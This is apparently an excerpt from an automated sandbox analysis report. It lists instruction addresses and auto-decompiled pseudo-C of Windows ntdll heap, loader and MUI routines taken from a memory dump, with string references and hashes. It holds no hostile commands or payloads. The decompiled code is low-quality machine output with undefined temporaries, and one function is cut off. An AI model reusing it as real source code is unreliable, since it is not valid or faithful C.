0x029c1f5f
0x029c1f7e
0x029c1f83
0x029c1f61
0x029c1f76
0x029c1f7b
0x029c1f89
0x029c1f8e
0x029c1f93
0x029c1f94
0x029c1f9a
0x029c1f9c
0x029c1f9e
0x029c1fa1
0x029c1fa1
0x029c1fa6
0x029c1fa6
0x029c1f50
0x0297a74e
0x0297a751
0x0297a754
0x0297a75d
0x0297a75e
0x0297a762
0x0297a767
0x029c1faf
0x029c1fb0
0x029c1fb9
0x029c1fbe
0x029c1fc2
0x029c1fc2
0x0297a76d
0x0297a76d
0x0297a775
0x0297a778
0x0297a77d
0x0297a77d
0x0297a71e
0x0297a782
0x0297a787
0x0297a789
0x029c1ff3
0x0297a78f
0x0297a78f
0x0297a78f
0x0297a791
0x0297a794
0x029c1ffd
0x029c2006
0x029c200c
0x029c2017
0x029c2019
0x029c2024
0x029c2024
0x029c2024
0x029c2047
0x029c2047
0x029c200c
0x0297a79a
0x0297a79f
0x0297a7a4
0x0297a7a9
0x0297a7ab
0x029c205a
0x0297a7b1
0x0297a7b1
0x0297a7b1
0x0297a7b3
0x0297a7b6
0x00000000
0x0297a7bc
0x029c2066
0x029c2068
0x029c2073
0x029c2073
0x029c2073
0x029c2078
0x029c2079
0x029c207d
0x00000000
0x029c207d
0x0297a7b6
0x0297a440
0x0297a440
0x0297a440
0x0297a446
0x0297a44c
0x0297a44f
0x0297a453
0x0297a455
0x029c20b3
0x029c20b9
0x029c20b9
0x0297a45d
0x0297a460
0x0297a464
0x0297a466
0x0297a46b
0x0297a46f
0x0297a471
0x0297a471
0x0297a471
0x0297a474
0x0297a479
0x0297a47d
0x0297a47f
0x029c2229
0x029c222f
0x0297a3c8
0x0297a3c8
0x0297a3ca
0x0297a3ca
0x00000000
0x0297a3ca
0x029c2235
0x029c223a
0x029c223a
0x00000000
0x00000000
0x029c2240
0x029c2246
0x029c224a
0x029c2269
0x029c226e
0x029c224c
0x029c2261
0x029c2266
0x029c2274
0x029c2279
0x029c227e
0x029c2286
0x029c2288
0x029c228d
0x029c228d
0x029c2292
0x029c2292
0x029c2295
0x029c2295
0x00000000
0x029c2295
0x0297a485
0x0297a489
0x0297a48b
0x0297a48f
0x0297a493
0x0297a497
0x0297a49b
0x0297a4bb
0x0297a4bb
0x0297a4bd
0x0297a4ff
0x0297a4ff
0x0297a501
0x0297a505
0x0297a50f
0x0297a517
0x0297a51b
0x0297a527
0x0297a52b
0x029c2182
0x029c2185
0x029c2193
0x029c2199
0x029c2199
0x0297a531
0x0297a535
0x0297a538
0x0297a548
0x0297a54b
0x0297a54d
0x0297a553
0x0297a559
0x029c2100
0x029c2103
0x029c2109
0x029c210f
0x029c2112
0x029c2131
0x029c2136
0x029c2114
0x029c2129
0x029c212e
0x029c213c
0x029c2141
0x029c2147
0x029c214d
0x029c2151
0x029c2154
0x029c2154
0x029c2159
0x029c2159
0x029c2103
0x0297a55f
0x0297a562
0x0297a565
0x0297a567
0x029c2162
0x0297a56d
0x0297a574
0x0297a575
0x0297a579
0x0297a57e
0x029c2169
0x029c216a
0x029c2170
0x029c2175
0x029c2179
0x029c2179
0x0297a57e
0x0297a584
0x0297a58f
0x0297a58f
0x0297a52b
0x0297a5ad
0x0297a5bc
0x0297a5c1
0x0297a5c6
0x0297a5cb
0x0297a5cd
0x029c21a9
0x0297a5d3
0x0297a5d3
0x0297a5d3
0x0297a5d5
0x0297a5d8
0x029c21b3
0x029c21bc
0x029c21c2
0x029c21cd
0x029c21cf
0x029c21da
0x029c21da
0x029c21da
0x029c21f7
0x029c21f7
0x029c21c2
0x0297a5de
0x0297a5e3
0x0297a5e8
0x0297a5ea
0x029c220a
0x0297a5f0
0x0297a5f0
0x0297a5f0
0x0297a5f2
0x0297a5f5
0x029c2219
0x029c221b
0x029c208c
0x029c208c
0x029c208c
0x029c2095
0x029c2096
0x029c2097
0x029c2098
0x029c20a4
0x029c20a5
0x029c20a9
0x029c20a9
0x00000000
0x0297a5f5
0x0297a4bf
0x0297a4d3
0x0297a4d8
0x0297a4da
0x029c1ede
0x029c1ede
0x029c1ee4
0x029c1ee9
0x00000000
0x00000000
0x029c1f07
0x00000000
0x029c1f07
0x0297a4e0
0x0297a4e5
0x0297a4e7
0x029c20cb
0x0297a4ed
0x0297a4ed
0x0297a4ed
0x0297a4f2
0x0297a4f5
0x029c20d5
0x029c20de
0x029c20e4
0x029c20f6
0x029c20f6
0x029c20e4
0x0297a4fb
0x00000000
0x0297a4fb
0x0297a4a1
0x0297a4a4
0x0297a4a8
0x00000000
0x00000000
0x0297a4aa
0x0297a4ac
0x00000000
0x00000000
0x0297a4b2
0x0297a4b5
0x00000000
0x00000000
0x00000000
0x0297a4b5
0x0297a43a
0x0297a340
0x0297a346
0x0297a600
0x00000000
0x0297a600
0x0297a34f
0x0297a351
0x0297a358
0x0297a3c6
0x00000000
0x0297a371
0x0297a37a
0x0297a37f
0x0297a382
0x0297a384
0x0297a394
0x00000000
0x0297a396
0x0297a399
0x0297a3a7
0x0297a3b0
0x0297a3b4
0x0297a3bb
0x0297a3d2
0x0297a3da
0x0297a3df
0x0297a3e1
0x0297a3e5
0x0297a3ea
0x0297a3f0
0x0297a3f0
0x0297a3e1
0x00000000
0x0297a3bb
0x0297a394

Strings

(UCRBlock != NULL), xrefs: 029C1EA0
HEAP: , xrefs: 029C1E95, 029C1F7E, 029C2131, 029C2269
(!TrailingUCR), xrefs: 029C2274
(LONG)FreeEntry->Size > 1, xrefs: 029C213C
MZER, xrefs: 0297A411
((LONG)FreeEntry->Size > 1), xrefs: 029C1F89
HEAP[%wZ]: , xrefs: 029C1E88, 029C1F71, 029C2124, 029C225C

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]: $MZER
API String ID: 0-2800228822
Opcode ID: 7fe2d17c57b47badacb1a34492e6cd3f990af68360f1d11ceef96250e70fd44c
Instruction ID: c801f5b1083fdb63cdc1ffe1ceaa97b8e0cbf43129c25babe65b08dad942c025
Opcode Fuzzy Hash: 7fe2d17c57b47badacb1a34492e6cd3f990af68360f1d11ceef96250e70fd44c
Instruction Fuzzy Hash: 2942CF716083819FD715DF28C894B2EBBEAFF84718F14496DE88A8B391D734D981CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0297B477, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 405
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E0297B477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0x2a4d360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E0297B8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E0299B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0x2a48748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E0295B150();
						} else {
							E0295B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E0295B150();
						__eflags =  *0x2a47bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E02A12073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0x2a48a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0x2a4b1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E02999730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E02A1A80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E02999660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E02A1138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E02A0FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E02A1A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E02A1A80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E02977D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E02A11582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E02977D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E02A11582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E0297B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E0297BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E02A1A80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}

0x0297b486
0x0297b48a
0x0297b48e
0x0297b491
0x0297b493
0x0297b49a
0x0297b49c
0x0297b4a2
0x0297b4a7
0x0297b6fc
0x0297b6fc
0x0297b6b3
0x0297b6c3
0x0297b6c3
0x0297b4b4
0x029c294f
0x029c2951
0x029c2957
0x029c295d
0x029c2961
0x029c2980
0x029c2985
0x029c2963
0x029c2978
0x029c297d
0x029c298b
0x029c2990
0x029c2995
0x029c299d
0x029c29a1
0x029c29a2
0x029c29a2
0x029c29a7
0x029c29a7
0x029c2951
0x0297b4ba
0x0297b4ba
0x0297b4bd
0x0297b4c2
0x0297b6d4
0x0297b4c8
0x0297b4c8
0x0297b4c8
0x0297b4cd
0x0297b4d0
0x0297b4d9
0x0297b4df
0x0297b4e2
0x029c29b7
0x029c29bd
0x00000000
0x0297b4e8
0x0297b4e8
0x0297b4ef
0x0297b4fa
0x0297b703
0x0297b709
0x0297b70b
0x0297b711
0x0297b711
0x0297b70b
0x0297b503
0x0297b50c
0x0297b511
0x0297b514
0x0297b519
0x029c29c5
0x029c29c7
0x029c29cc
0x029c29cd
0x029c29cf
0x029c29d0
0x029c29d2
0x029c29d7
0x029c29d9
0x029c29ee
0x029c29ee
0x029c29f4
0x029c29fa
0x029c2a01
0x00000000
0x029c2a01
0x029c29db
0x029c29df
0x00000000
0x00000000
0x029c29e1
0x029c29e4
0x00000000
0x00000000
0x029c29e6
0x029c29e6
0x0297b51f
0x0297b51f
0x0297b520
0x0297b525
0x0297b52b
0x0297b52d
0x0297b52e
0x0297b530
0x0297b535
0x0297b53b
0x0297b53d
0x029c2a07
0x00000000
0x029c2a07
0x0297b549
0x0297b54e
0x029c2a12
0x029c2a15
0x00000000
0x00000000
0x029c2a24
0x0297b559
0x0297b55c
0x029c2a34
0x029c2a3b
0x029c2a4d
0x029c2a4d
0x029c2a3b
0x0297b566
0x0297b56b
0x0297b56f
0x0297b57b
0x0297b582
0x029c2a57
0x029c2a5c
0x029c2a5c
0x0297b582
0x0297b58b
0x0297b58e
0x0297b592
0x0297b596
0x0297b599
0x0297b59b
0x0297b59e
0x0297b5a3
0x0297b5a6
0x0297b5a9
0x029c2a66
0x029c2a67
0x029c2a73
0x029c2a78
0x0297b5b8
0x0297b5b8
0x0297b5bb
0x0297b5bd
0x0297b5bd
0x0297b5c4
0x0297b5f7
0x0297b5f7
0x0297b600
0x0297b606
0x0297b60c
0x0297b612
0x0297b618
0x0297b621
0x0297b623
0x0297b629
0x0297b629
0x0297b62c
0x0297b62f
0x0297b633
0x0297b636
0x0297b639
0x0297b71d
0x0297b720
0x0297b736
0x0297b660
0x0297b660
0x0297b662
0x0297b665
0x0297b66a
0x0297b6e6
0x0297b6e7
0x0297b6ea
0x0297b6ef
0x029c2ad1
0x029c2ad2
0x029c2ad8
0x029c2add
0x029c2add
0x0297b6f5
0x0297b6f5
0x0297b672
0x0297b675
0x0297b67a
0x029c2ae5
0x029c2ae8
0x00000000
0x00000000
0x029c2af4
0x029c2afc
0x00000000
0x0297b680
0x0297b680
0x0297b680
0x0297b685
0x0297b687
0x0297b68a
0x029c2b06
0x029c2b0c
0x029c2b13
0x029c2b1e
0x029c2b20
0x029c2b2b
0x029c2b2b
0x029c2b2b
0x029c2b34
0x029c2b45
0x029c2b45
0x029c2b13
0x0297b696
0x0297b69b
0x0297b6a0
0x029c2b4f
0x029c2b52
0x00000000
0x00000000
0x029c2b61
0x00000000
0x0297b6a6
0x0297b6a6
0x0297b6a6
0x0297b6a8
0x0297b6ab
0x029c2b70
0x029c2b72
0x029c2b7d
0x029c2b7d
0x029c2b7d
0x029c2b86
0x029c2b97
0x029c2b97
0x0297b6b1
0x00000000
0x0297b6b1
0x0297b6a0
0x0297b67a
0x0297b722
0x0297b722
0x0297b655
0x0297b65d
0x00000000
0x0297b5c6
0x0297b5c6
0x0297b5ce
0x029c2a83
0x029c2a97
0x029c2a97
0x029c2a9a
0x00000000
0x00000000
0x029c2a88
0x029c2a8a
0x029c2a8c
0x029c2a8f
0x029c2a92
0x029c2aa1
0x029c2aa1
0x029c2aa2
0x029c2aab
0x029c2ab0
0x00000000
0x029c2ab0
0x029c2a94
0x029c2a94
0x00000000
0x029c2a9c
0x0297b5d4
0x0297b5d4
0x0297b5d6
0x0297b5d9
0x0297b5de
0x0297b5e1
0x0297b5e4
0x029c2ab8
0x029c2ab9
0x029c2ac4
0x029c2ac9
0x0297b5f2
0x0297b5f2
0x0297b5f4
0x0297b5f4
0x00000000
0x0297b5e4
0x0297b5c4
0x0297b554
0x0297b554
0x00000000
0x0297b554

Strings

HEAP: , xrefs: 029C2980
(UCRBlock->Size >= *Size), xrefs: 029C298B
MZER, xrefs: 0297B6D4
HEAP[%wZ]: , xrefs: 029C2973

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]: $MZER
API String ID: 0-1715377171
Opcode ID: 4f0e996a0c61cf99c1dd377f7974af805bfbd419850910ba62b4605253a109a4
Instruction ID: 9a104901cb7c805787180c642d6ce03a68236923cbc05ac0c8fc9e59a38a6f14
Opcode Fuzzy Hash: 4f0e996a0c61cf99c1dd377f7974af805bfbd419850910ba62b4605253a109a4
Instruction Fuzzy Hash: C7E1AE70B00205DFDB19CF68C9A4BBAB7BAFF44318F2445A9E5069B391D734E941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02988E00, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 126
timeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E02988E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x2a4d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x2a48464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x2a45780 & 0x00000003) != 0) {
							E029D5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x2a45780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0299B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x2a47984; // 0xaa2bd0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x2a48464; // 0x74b10110
					 *0x2a4b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E02989B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x2a45780 & 0x00000005) != 0) {
						_push(_t49);
						E029D5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x02988e0f
0x02988e16
0x02988e19
0x02988e1b
0x02988e21
0x02988e7f
0x02988e85
0x029c9354
0x029c936c
0x029c9371
0x029c937b
0x029c9381
0x029c9381
0x029c937b
0x02988e9d
0x02988e9d
0x02988e29
0x02988e2c
0x02988e38
0x02988e3e
0x02988e43
0x02988eb5
0x02988eb9
0x029c92aa
0x029c92af
0x029c92e8
0x029c92e8
0x029c92af
0x02988eb9
0x02988e45
0x02988e53
0x02988e5b
0x02988e5f
0x02988e78
0x02988e78
0x02988e7d
0x02988ec3
0x02988ecd
0x02988ed2
0x02988ed2
0x02988ec5
0x02988ec5
0x00000000
0x02988e7d
0x02988e67
0x02988ea4
0x029c931a
0x00000000
0x00000000
0x029c9320
0x02988ea4
0x02988e70
0x029c9325
0x029c9340
0x029c9345
0x029c9345
0x02988e76
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 02988E53

Strings

LdrpFindDllActivationContext, xrefs: 029C9331, 029C935D
Querying the active activation context failed with status 0x%08lx, xrefs: 029C9357
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 029C932A
minkernel\ntdll\ldrsnap.c, xrefs: 029C933B, 029C9367

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: bc2f2e23679bf10a97362f0d470463a89e3ded2852f1159e17647e4b4b689f46
Instruction ID: 572d3a6595f7c7612e329e69817ce0f0b6345be8e42488d59b896d44e212ff2a
Opcode Fuzzy Hash: bc2f2e23679bf10a97362f0d470463a89e3ded2852f1159e17647e4b4b689f46
Instruction Fuzzy Hash: FA41F733E4071D9FEB35BB18884CB35B3A9BB84358F8D4969D80957193EB60ED80C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 02963D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E02963D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E02961B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E02961B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
